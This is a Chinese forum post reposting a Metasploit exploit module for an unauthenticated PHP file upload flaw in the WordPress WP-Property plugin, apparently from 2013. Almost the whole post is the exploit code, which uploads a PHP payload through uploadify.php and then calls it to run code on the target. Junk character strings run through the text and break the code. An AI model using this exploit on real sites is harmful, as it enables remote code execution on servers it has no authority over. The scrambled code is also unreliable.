WordPress WP-Property PHP 文件上传漏洞- q+ `$ x. W, v& X
+ }, j3 L$ f% \. t* i+ i. J0 }+ M ## # This file is part of the Metasploit Framework and may be subject to0 f; x" Q, `3 s
# c0 r$ _, Y7 O6 Z- Z3 {8 J
# redistribution and commercial restrictions. Please see the Metasploit7 ?0 Z" ~* \% F3 T. }2 M. e+ Q
# u) V3 q( l8 C4 P# Framework web site for more information on licensing and terms of use.
1 _: [6 n# U$ Y( o1 `% p/ T$ y
0 |! g$ n j ^% B! J# http://metasploit.com/framework/ ##
/ p8 V" I1 L5 q
; S5 z7 V& y0 [; a
6 [1 }* E2 H- e+ p7 C: `
) @0 {" e* b0 ]: @( ` 9 H6 [; P- e8 N8 i
6 p" h6 |, c' t0 {2 D
require 'msf/core', U" I% |2 w+ [/ A
require 'msf/core/exploit/php_exe'& s9 _; E: [; U5 s+ M. C; C% S
/ b1 T; `) u1 _ f& O0 C7 aclass Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
4 ]9 w$ Y0 E. |1 R1 V3 T'Description' => %q{- i$ C% u, E8 S9 f- A+ |5 S0 `
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>
8 ]& g$ `; C9 c" |# Y8 o+ T[
9 x: z9 K/ ^( v! g( I8 X$ @'Sammy FORGIT', # initial discovery% n7 `: ~; M5 B( z9 n
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
! T {" L: X3 V$ h],
, I) {; v/ b! V0 N! w3 D5 z'License' => MSF_LICENSE,3 ^ H! Q2 |# a8 y# _) Z( w
'References' =>: a& Z! |' F# g: \/ D( U- m% m
[' f- I; [8 G c" k" ]
[ 'OSVDB', '82656' ],
6 H$ j/ X& ~ e% Y; {[ 'BID', '53787' ],. Q/ Y5 I. o# C
[ 'EDB', '18987'],* P. [) N+ H @ C4 z* J
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]2 G @8 B; F: _" l
],
) l8 ?/ T# E0 P2 E9 D' w'Payload' =>8 @; U1 _' s* b# v, |! y
{
! N6 w+ s1 e2 l" q; I'BadChars' => "\x00",, t4 ]* ]" }: A1 o l# v' h4 [
},! w& M0 A! [( M5 S1 c; C, ~
'Platform' => 'php',) i% O8 }9 a2 B! J7 Y
'Arch' => ARCH_PHP,
" b6 g; X" C$ c9 N3 V$ d'Targets' =>9 B m3 Q/ ~: G' B& r
[# R; H" r. o9 `
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
F* G& x5 O: O' o, u$ j[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
B7 `0 P4 o* p1 l6 y' a],' i1 Z Q. m! H" S" ]2 R
'DefaultTarget' => 0,+ }7 O( X( {0 ?% P7 A+ s( N' l1 D
'DisclosureDate' => 'Mar 26 2012'))3 _' c6 @. D, K2 [0 U+ _4 S$ V
7 s: E3 }/ ^+ e" g- l
register_options(
8 j5 J/ |' t" _. Q: v& ~[
2 R- K+ i$ P% I j% t+ w% f% W: YOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
; }( G6 F2 }0 V7 t], self.class)
# \& q! q5 N7 o! @/ X5 yend
+ ~; y3 |8 r- R8 Z7 e i' m( }8 d& A. w; k
def check
- `2 o2 K# U. z+ h( \( Y1 _uri = target_uri.path! d1 z1 g( R4 j, {# s8 ~+ ?2 X; D
uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
% w, H! ^' p( d3 c# i& w7 O'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"0 W7 u) w7 w$ \* T! O6 |
})
; {2 q) R. ]" _$ u" {
3 h3 f+ J7 w- ?if not res or res.code != 200
& a8 E: |$ a4 t5 Hreturn Exploit::CheckCode::Unknown: V: o8 H- H: n
end
J7 i# o. U7 Q( U, ?8 f* _. L
* }* t, M$ O4 y1 T" ]return Exploit::CheckCode::Appears
5 E/ U# e3 J3 q/ \end
( h: }- t5 }( Y) v/ f y
1 o- A* f( z' J) h# jdef exploit* Q! V, p' J9 b# I# J3 z/ |; X5 G8 ~
uri = target_uri.path5 Y* q" O5 r/ {# `5 s
uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true) x: v, p$ @1 r% C* m
0 j" |* S# x) ddata = Rex::MIME::Message.new
: }& m) z9 m1 _" ?: `& pdata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
; g6 l5 x, `+ s# |3 [data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")( w: j5 s: N. n" o8 U
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')$ J3 k: _* h, w* A4 o1 F+ [) Y
! k: O+ } o8 ]2 E* w Lprint_status("#{peer} - Uploading payload #{@payload_name}")
0 a3 {, {1 j; ~res = send_request_cgi({
6 R( y% i6 p1 x'method' => 'POST',) H6 {4 k, K( A1 Z+ u& M
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",! |2 X8 [2 _: g" l2 q6 H
'ctype' => "multipart/form-data; boundary=#{data.bound}",
; k# Z, D, G; J- H$ O' S: v'data' => post_data
. k) S+ ], i# Q- ~+ k* G3 y6 e2 ^1 f0 Y}). \) L. R/ G7 b Q
& q* d) ?5 |8 M/ h% Aif not res or res.code != 200 or res.body !~ /#{@payload_name}/* N% J* x4 N3 h9 B: |$ w% ^; z
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")% b$ o8 r8 ]; k+ W5 K1 f( Z
end
9 H6 g# _4 O b+ N3 \0 D8 q; E' O. f9 X* H
upload_uri = res.body. k# u) f& f5 h) j5 O
: L- I: l! r* @9 ^
print_status("#{peer} - Executing payload #{@payload_name}")
: F9 c! U' s& d6 h1 ures = send_request_raw({) O T4 Y$ M+ H" a- ]% j, f
'uri' => upload_uri,$ \" d. o0 z, G3 U5 y7 T- q* N
'method' => 'GET'
7 x9 ^( ^# k$ l5 I1 r. |})
" j; j& B1 u7 [* Y: Aend
# a, Y) d3 O. h2 H! n, B) @4 Wend# ~4 ~' [* w, F4 a
5 V- d# s1 f% I8 V0 w+ w不要问我这写的是什么 怎么利用 我是说msf.
0 E1 S# n1 l6 B4 E2 G* S! @( f1 u6 V3 {% m" p
|
发表于 2013-1-4 19:51:30
收藏
支持
反对